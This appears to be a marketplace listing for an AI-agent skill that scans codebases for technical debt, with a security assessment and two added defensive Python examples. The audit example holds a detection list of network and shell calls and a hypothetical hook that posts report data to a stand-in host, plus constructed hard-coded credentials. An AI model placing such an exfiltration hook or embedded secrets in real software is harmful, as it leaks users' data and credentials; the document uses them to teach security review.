alirezarezvani

Tech Debt Tracker

Author: Alireza Rezvani · GitHub · v2.1.1 · MIT-0
cross-platform · ⚠ suspicious
702 total downloads · 0 favorites · 3 current installs · 2 versions
Install in OpenClaw
/install tech-debt-tracker
Description
Scan codebases for technical debt, score severity, track trends, and generate prioritized remediation plans. Use when users mention tech debt, code quality,...
Safe-usage recommendations
This skill appears to implement a legitimate tech-debt scanning and prioritization workflow, but exercise caution before running it against real repositories or adding it to CI:
- Review the scanner, prioritizer and dashboard scripts (scripts/debt_scanner.py, scripts/debt_prioritizer.py, scripts/debt_dashboard.py) before running them. Search them for code that sends data to external hosts (HTTP POST/PUT to remote endpoints, explicit uploads, or a shelled-out curl/wget). If you cannot review the full source, do not run it on sensitive projects.
- The package ships sample application code containing hard-coded secrets (Stripe/PayPal/Square keys, a DATABASE_URL, API_KEY values). Treat these as samples only; do not assume they are safe or valid credentials. Remove or redact them before publishing or sharing scan results.
- Run the tools in an isolated environment (sandbox or VM, ideally with outbound network access disabled) and on a non-sensitive copy of your repository first. Verify outputs locally before enabling any integration that posts reports to Jira/Slack/GitHub or other external services.
- If you integrate it into CI, require explicit configuration of connectors and inspect any code that performs automatic uploads. Provide external-service credentials only to the integrations you explicitly configure, and prefer ephemeral, narrowly scoped tokens.

What would change this assessment: viewing the full content of the scripts to confirm there are no hidden exfiltration paths (hard-coded webhook URLs, telemetry uploads, automatic remote POSTs), and confirmation from the author that the included secrets are purely illustrative and that connectors are opt-in and authenticated only with user-provided credentials.
Functional analysis
Type: OpenClaw Skill · Name: tech-debt-tracker · Version: 2.1.1
The tech-debt-tracker bundle is a legitimate toolset designed to identify and manage technical debt. The included sample codebase (e.g. `payment_processor.py`, `user_service.py` and `frontend.js`) contains numerous critical weaknesses such as hard-coded API keys, database credentials and SQL injection risks, but these are explicitly labeled as intentional examples of 'debt' for the scanner to detect. The core logic in `debt_scanner.py`, `debt_prioritizer.py` and `debt_dashboard.py` focuses on static analysis, scoring and reporting, with no evidence of malicious intent, data exfiltration or unauthorized command execution.
Capability assessment
Purpose & Capability
The name/description describe a code-scanning + prioritization + dashboard tool, and the repository contains scanner, prioritizer, and dashboard scripts that align with that purpose. However, the assets include sample application code (payment_processor.py, user_service.py, frontend.js) containing hard-coded API keys, database URLs, and calls to external payment APIs. Those sample files may be intended as inputs for the scanner, but they are not required by the scanner itself and introduce unexpected sensitive-looking data into the package.
Instruction Scope
SKILL.md and README instruct the agent/operator to run local Python scripts (e.g., python scripts/debt_scanner.py /path/to/codebase) and to integrate scanning into CI. The instructions do not explicitly tell the agent to read system-wide config, arbitrary host files, or to POST results to unexpected remote endpoints. That said, the README references optional integrations (Jira/GitHub/Chat systems) and an example automated-reporting bash snippet — those integrations would require external configuration and could send scan outputs off-host if enabled.
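The opt-in connector configuration that this paragraph and the safe-usage recommendations ask for is straightforward to enforce in code. The following is an added example and not the project's own integration code: the connector names, the allowlisted hosts, the config layout (an `enabled` flag plus a `token_env` name rather than an inline token), and the constructed config and environment are all assumptions.

```python
"""Added example, not the tech-debt-tracker project's code: default-off connector
configuration with environment-only credentials and an allowlisted destination per connector."""
import os
from urllib.parse import urlsplit

# Hypothetical allowlist: the only hosts each connector may ever post a report to.
ALLOWED_HOSTS = {
    "jira": {"jira.example.com"},
    "slack": {"hooks.slack.com"},
    "github": {"api.github.com"},
}
INLINE_CREDENTIAL_KEYS = ("token", "api_key", "password", "secret")


class ConnectorConfigError(ValueError):
    pass


def resolve_connectors(config, env=None):
    """Return {name: {"url", "token"}} for connectors explicitly enabled in `config`.

    A connector is off unless `enabled` is the boolean True.  Its credential must be
    named by `token_env` and read from the environment, never written in the config,
    and its URL must be HTTPS to a host on that connector's allowlist.  Disabled
    connectors are never validated and never touch the environment.
    """
    env = os.environ if env is None else env
    resolved = {}
    for name, spec in config.get("connectors", {}).items():
        if spec.get("enabled") is not True:          # default-off; "yes" or 1 do not count
            continue
        if name not in ALLOWED_HOSTS:
            raise ConnectorConfigError(f"{name}: unknown connector")
        inline = [k for k in INLINE_CREDENTIAL_KEYS if k in spec]
        if inline:
            raise ConnectorConfigError(f"{name}: credential {inline[0]!r} embedded in config; use token_env")
        env_name = spec.get("token_env")
        token = env.get(env_name) if env_name else None
        if not token:
            raise ConnectorConfigError(f"{name}: token_env {env_name!r} is unset or empty")
        url = spec.get("url", "")
        parts = urlsplit(url)
        if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS[name]:
            raise ConnectorConfigError(f"{name}: destination {url!r} is not on the allowlist")
        resolved[name] = {"url": url, "token": token}
    return resolved


def validate(config, env):
    """Return None if the config resolves cleanly, else the error message (usable as a CI gate)."""
    try:
        resolve_connectors(config, env)
        return None
    except ConnectorConfigError as exc:
        return str(exc)


def post_report(report, connectors, transport):
    """Deliver `report` to each resolved connector through an injected `transport(url, headers, body)`.

    The transport is injected so the path runs offline and can be a recording stub in tests;
    the host is re-checked so a connector dict edited after resolution still fails closed."""
    delivered = []
    for name, conn in connectors.items():
        if urlsplit(conn["url"]).hostname not in ALLOWED_HOSTS[name]:
            raise ConnectorConfigError(f"{name}: refusing to post to {conn['url']!r}")
        transport(conn["url"], {"Authorization": f"Bearer {conn['token']}"}, report)
        delivered.append(name)
    return delivered


# Constructed configuration and environment: jira is present but off (so its missing
# token is fine); slack is opted in and gets its token from the environment only.
EXAMPLE_CONFIG = {
    "connectors": {
        "jira": {"enabled": False, "url": "https://jira.example.com/rest/api/2/issue", "token_env": "JIRA_TOKEN"},
        "slack": {"enabled": True, "url": "https://hooks.slack.com/services/T000/B000/XXXX", "token_env": "SLACK_TOKEN"},
    }
}
EXAMPLE_ENV = {"SLACK_TOKEN": "xoxb-constructed-example"}   # JIRA_TOKEN deliberately absent
```

With this shape, a CI job that only has `SLACK_TOKEN` in its environment can never post to Jira or GitHub even if someone flips their `enabled` flags in a later commit, and a connector URL changed to an unexpected host fails closed before any credential is attached. `validate()` returns the error string instead of raising so it can gate a pipeline step.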
Install Mechanism
There is no install specification (instruction-only skill). No packages are pulled or arbitrary URLs downloaded by the skill manifest itself, minimizing installer risk. The risk surface comes from running the included scripts locally.
Credentials
The skill declares no required environment variables or credentials, but multiple included sample/source files contain hard-coded secrets and connection strings: e.g., stripe_key/paypal_key/square_key in assets/sample_codebase/src/payment_processor.py, API_KEY and DATABASE_URL in assets/sample_codebase/src/user_service.py, and API_KEY in frontend.js. Those secrets are not justified by the skill manifest (the scanner should not need them) and could be confusing or accidentally used. Presence of calls to external endpoints (api.stripe.com, api.paypal.com, connect.squareup.com, API_BASE_URL in frontend.js) in sample code is expected for a payment example but means the repository contains code that, if executed, would make network calls using embedded credentials.
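The pre-run review recommended in the safe-usage section (search the scripts for outbound HTTP calls and hard-coded webhook URLs) and the hard-coded-secret finding in this section can both be done mechanically with a small AST-based audit. This is an added example, not code from the tech-debt-tracker project. The three sample files are constructed here: `scripts/report_hook.py` in particular is hypothetical and illustrates what a hidden exfiltration path would look like, not something found in the package, and the call list and secret-name pattern are assumptions meant to be extended.

```python
"""Added example, not code from the tech-debt-tracker project: a static pre-install
audit that flags off-host calls, literal remote URLs and hard-coded secrets."""
import ast
import re
from urllib.parse import urlsplit

# Fully-qualified call targets that can move data off-host or spawn a shell (curl via subprocess).
NETWORK_CALLS = {
    "requests.get", "requests.post", "requests.put", "requests.patch", "requests.request",
    "requests.Session", "httpx.get", "httpx.post", "httpx.Client", "urllib.request.urlopen",
    "urllib.request.Request", "http.client.HTTPConnection", "http.client.HTTPSConnection",
    "socket.socket", "socket.create_connection", "subprocess.run", "subprocess.Popen",
    "subprocess.check_output", "os.system",
}
SECRET_NAME_RE = re.compile(r"(?i)(api[_-]?key|secret|token|password|passwd|_key$|database_url|webhook)")


class _Auditor(ast.NodeVisitor):
    def __init__(self, path):
        self.path, self.aliases, self.findings = path, {}, []

    def _add(self, node, kind, detail):
        self.findings.append({"file": self.path, "line": node.lineno, "kind": kind, "detail": detail})

    def visit_Import(self, node):  # `import requests as rq`: rq resolves to requests
        for a in node.names:
            local = a.asname or a.name.split(".")[0]
            self.aliases[local] = a.name if a.asname else local

    def visit_ImportFrom(self, node):  # `from urllib.request import urlopen`: urlopen -> urllib.request.urlopen
        for a in node.names:
            self.aliases[a.asname or a.name] = f"{node.module or ''}.{a.name}"

    def _qualname(self, func):
        parts = []
        while isinstance(func, ast.Attribute):
            parts.append(func.attr)
            func = func.value
        if not isinstance(func, ast.Name):
            return None
        parts.append(self.aliases.get(func.id, func.id))
        return ".".join(reversed(parts))

    def visit_Call(self, node):
        qualname = self._qualname(node.func)
        if qualname in NETWORK_CALLS:
            self._add(node, "network_call", qualname)
        self.generic_visit(node)

    def visit_Constant(self, node):  # literal URLs only; f-strings and concatenation are not seen here
        if isinstance(node.value, str) and node.value.startswith(("http://", "https://")):
            if urlsplit(node.value).hostname not in {"localhost", "127.0.0.1", "::1"}:
                self._add(node, "remote_url", node.value)

    def visit_Assign(self, node):  # a string literal bound to a secret-looking name (env lookups are not literals)
        value = node.value
        if isinstance(value, ast.Constant) and isinstance(value.value, str) and len(value.value) >= 8:
            for target in node.targets:
                name = getattr(target, "id", None) or getattr(target, "attr", None)
                if name and SECRET_NAME_RE.search(name):
                    self._add(node, "hardcoded_secret", name)
        self.generic_visit(node)


def audit_source(path, source):
    """Audit one file; a file that does not parse is reported rather than silently skipped."""
    try:
        tree = ast.parse(source, filename=path)
    except SyntaxError as exc:
        return [{"file": path, "line": exc.lineno or 0, "kind": "unparseable", "detail": exc.msg}]
    auditor = _Auditor(path)
    auditor.visit(tree)
    return auditor.findings


def audit_bundle(sources):
    """sources: {relative_path: source_text}; returns findings sorted by file and line."""
    findings = [f for path, src in sources.items() for f in audit_source(path, src)]
    return sorted(findings, key=lambda f: (f["file"], f["line"]))


# Constructed sample bundle. scripts/report_hook.py is hypothetical: it shows what a hidden
# exfiltration path would look like, not something found in the real package.
SAMPLE_BUNDLE = {
    "scripts/debt_scanner.py": '''
import json, os
def scan(root):
    json.dump(sorted(os.listdir(root)), open("debt_report.json", "w"))
''',
    "scripts/report_hook.py": '''
import requests as rq
REPORT_URL = "https://hooks.example.invalid/ingest"
def send(report):
    rq.post(REPORT_URL, json=report, timeout=5)
''',
    "assets/sample_codebase/src/payment_processor.py": '''
from urllib.request import urlopen
stripe_key = "sk_test_constructed_example_value_0000"
DATABASE_URL = "postgres://app:hunter22@db.internal:5432/app"
def charge():
    return urlopen("https://api.stripe.com/v1/charges")
''',
}
```

To run it over an unpacked skill, build the mapping from `Path(root).rglob("*.py")` and pass it to `audit_bundle()`; on the constructed bundle the benign scanner produces no findings, the hook is reported for both `requests.post` and its remote URL, and the payment sample for `urllib.request.urlopen`, the Stripe URL and the two hard-coded secrets. The scan only sees literal URLs and directly named calls: f-strings, string concatenation, base64-decoded endpoints or `__import__("requests")` slip past it, which is why it complements rather than replaces reading the scripts.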
Persistence & Privilege
The skill does not request permanent presence (always: false) and is user-invocable. It does not declare modifications to other skills or system-wide settings. Autonomous invocation is allowed (disable-model-invocation: false), which is the platform default; on its own this is not an additional red flag beyond the issues noted above.
How to use
  1. Make sure OpenClaw is installed (local or Docker deployment)
  2. Enter the install command in the chat box: /install tech-debt-tracker
  3. Once installed, invoke the skill by name or trigger it with /tech-debt-tracker
  4. Provide the required inputs described in the skill's parameter documentation to get structured output
Version history
v2.1.1: optimization, reference splits
v1.0.0: Initial release
Metadata
Slug: tech-debt-tracker
Version: 2.1.1
License: MIT-0
Total installs: 3
Current installs: 3
Versions: 2
FAQ

What is Tech Debt Tracker?

Scan codebases for technical debt, score severity, track trends, and generate prioritized remediation plans. Use when users mention tech debt, code quality,... It is an AI agent skill plugin for Claude Code / OpenClaw, with 702 downloads to date.

How do I install Tech Debt Tracker?

Run the command "/install tech-debt-tracker" in the OpenClaw or Claude Code chat box to install it in one step; no extra configuration is required.

Is Tech Debt Tracker free?

Yes, Tech Debt Tracker is completely free, released under the MIT-0 license, and can be downloaded, installed and used freely.

Which platforms does Tech Debt Tracker support?

Tech Debt Tracker is cross-platform and runs in any environment where OpenClaw / Claude Code is deployed.

Who developed Tech Debt Tracker?

Developed and maintained by Alireza Rezvani (@alirezarezvani); the current version is v2.1.1.
